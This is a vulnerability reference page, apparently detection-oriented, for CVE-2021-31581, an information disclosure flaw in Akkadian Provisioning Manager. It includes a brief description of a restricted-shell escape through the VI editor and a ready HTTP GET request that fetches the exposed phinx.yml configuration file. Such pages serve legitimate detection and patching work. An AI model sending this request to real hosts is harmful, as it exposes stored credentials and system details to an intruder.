🔙 목록으로 돌아가기

CVE-2021-31581: Akkadian Provisioning Manager - Information Disclosure

TitleAkkadian Provisioning Manager - Information Disclosure
Authorgeeknik
SeverityMedium
ImpactAn attacker can exploit this vulnerability to access sensitive information, such as user credentials or system configuration details.
RemediationThis issue was resolved in Akkadian OVA appliance version 3.0 and later, Akkadian Provisioning Manager 5.0.2 and later, and Akkadian Appliance Manager 3.3.0.314-4a349e0 and later.
CVSS Score4.4
EPSS Score0.15575
CVE IDCVE-2021-31581
CWE IDCWE-269,CWE-312
Tags cve cve2021 akkadian mariadb disclosure akkadianlabs vuln

🔍 Vulnerability Description

Akkadian Provisioning Manager is susceptible to information disclosure. The restricted shell provided can be escaped by abusing the Edit MySQL Configuration command. This command launches a standard VI editor interface which can then be escaped.

🌐 HTTP Request

GET /pme/database/pme/phinx.yml HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-31581.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-31581.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A